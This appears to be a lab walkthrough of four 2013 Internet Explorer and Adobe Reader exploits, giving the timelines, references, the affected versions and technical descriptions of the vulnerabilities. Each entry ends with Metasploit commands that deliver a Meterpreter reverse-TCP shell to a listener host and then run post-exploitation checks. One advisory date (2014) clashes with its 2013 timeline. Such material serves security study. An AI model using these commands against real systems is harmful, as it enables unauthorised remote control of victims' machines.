CVE-2013-3918 CardSpaceClaimCollection ActiveX Integer Underflow

Timeline :

Vulnerability discovered exploited in the wild
Patched by the vendor via MS13-090 the 2013-11-12
Metasploit PoC provided the 2013-11-15

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2013-3918
BID-63631
MS13-090

Affected version(s) :

Windows XP SP3, Windows Vista SP2, Windows 7 SP1, Windows 8 and 8.1

Tested on :

with Internet Explorer 8 on Windows XP SP3

Description :

This module exploits a vulnerability on the CardSpaceClaimCollection class from the icardie.dll ActiveX control. The vulnerability exists while the handling of the CardSpaceClaimCollection object. CardSpaceClaimCollections stores a collection of elements on a SafeArray and keeps a size field, counting the number of elements on the collection. By calling the remove() method on an empty CardSpaceClaimCollection it is possible to underflow the length field, storing a negative integer. Later, a call to the add() method will use the corrupted length field to compute the address where write into the SafeArray data, allowing to corrupt memory with a pointer to controlled contents. This module achieves code execution by using VBScript as discovered in the wild on November 2013 to (1) create an array of html OBJECT elements, (2) create holes, (3) create a CardSpaceClaimCollection whose SafeArray data will reuse one of the holes, (4) corrupt one of the legit OBJECT elements with the described integer overflow and (5) achieve code execution by forcing the use of the corrupted OBJECT.

Commands :

use exploit/windows/browser/ms13_090_cardspacesigninhelper
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-3897 Microsoft Internet Explorer CDisplayPointer Use-After-Free

Timeline :

Vulnerability discovered exploited in the wild the 2013-09
Patched by the vendor via MS13-080 the 2013-10-08
Metasploit PoC provided the 2013-10-12

PoC provided by :

Unknown
sinn3r

Reference(s) :

CVE-2013-3897
MS13-080

Affected version(s) :

Internet Explorer 6, 7, 8, 9, 10 and 11.

Tested on :

with Internet Explorer 8 on Windows XP SP3

Description :

This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, around the same time frame as CVE-2013-3893, except this was kept out of the public eye by multiple research companies and the vendor until the October patch release. This issue is a use-after-free vulnerability in CDisplayPointer via the use of a “onpropertychange” event handler. To set up the appropriate buggy conditions, we first craft the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. If we use a select() function for the CTextArea element, two important things will happen: a CDisplayPointer object will be created for CTextArea, and it will also trigger another event called “onselect”. The “onselect” event will allow us to set up for the actual event handler we want to abuse – the “onpropertychange” event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in “onselect”, this will trigger “onpropertychange”. During “onpropertychange” event handling, a free of the CDisplayPointer object can be forced by using an “Unslect” (other approaches also apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because it is still trying to use that to update CDisplayPointer’s position. When this invalid reference arrives in QIClassID, a crash finally occurs due to accessing the freed memory. By controlling this freed memory, it is possible to achieve arbitrary code execution under the context of the user.

Commands :

use exploit/windows/browser/ms13_080_cdisplaypointer
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-3893 Microsoft Internet Explorer SetMouseCapture UAF

Timeline :

Vulnerability discovered exploited in the wild the 2013-08-23
Microsoft publish Microsoft Security Advisory 288750 the 2014-09-17
Microsoft publish a Fix it workaround the 2013-09-17
Metasploit PoC provided the 2013-09-30
Patched by the vendor via MS13-080 the 2013-10-08

PoC provided by :

Unknown
sinn3r
Rich Lundeen

Reference(s) :

CVE-2013-3893
MS13-080
MSA-2887505

Affected version(s) :

Internet Explorer 6, 7, 8, 9, 10 and 11.

Tested on :

with Internet Explorer 8 on Windows XP SP3

Description :

This module exploits a use-after-free vulnerability that currents targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well. The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a reference during an event. An attacker first can setup two elements, where the second is the child of the first, and then setup a onlosecapture event handler for the parent element. The onlosecapture event seems to require two setCapture() calls to trigger, one for the parent element, one for the child. When the setCapture() call for the child element is called, it finally triggers the event, which allows the attacker to cause an arbitrary memory release using document.write(), which in particular frees up a 0x54-byte memory. The exact size of this memory may differ based on the version of IE. After the free, an invalid reference will still be kept and pass on to more functions, eventually this arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary code execution) when this function attempts to use this reference to call what appears to be a PrivateQueryInterface due to the offset (0x00). To mimic the same exploit found in the wild, this module will try to use the same DLL from Microsoft Office 2007 or 2010 to leverage the attack.

Commands :

use exploit/windows/browser/ie_setmousecapture_uaf
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-3346 Adobe Reader ToolButton Use After Free

Timeline :

Vulnerability discovered by Soroush Dalili and reported to ZDI
Vulnerability reported to the vendor by ZDI the 2013-09-11
Patched by the vendor via APSB13-15 the 2013-08-03
Coordinated public release of advisory by ZDI the 2013-09-11
Vulnerability exploited in the wild in combination with another vulnerability the 2013-11-27
Metasploit PoC provided the 2013-12-16

PoC provided by :

Soroush Dalili
Unknown
sinn3r
juan vazquez

Reference(s) :

CVE-2013-3346
OSVDB-96745
ZDI-13-212
APSB13-15

Affected version(s) :

Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior.

Tested on :

with Adobe Reader 11.0.2 on Windows XP SP3

Description :

This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object allows triggering the use after free condition. This module has been tested successfully on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in November, 2013. At the moment, this module doesn’t support Adobe Reader 9 targets; in order to exploit Adobe Reader 9 the fileformat version of the exploit can be used. This exploit also exist in File format exploit/windows/fileformat/adobe_toolbutton

Commands :

use exploit/windows/browser/adobe_toolbutton
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo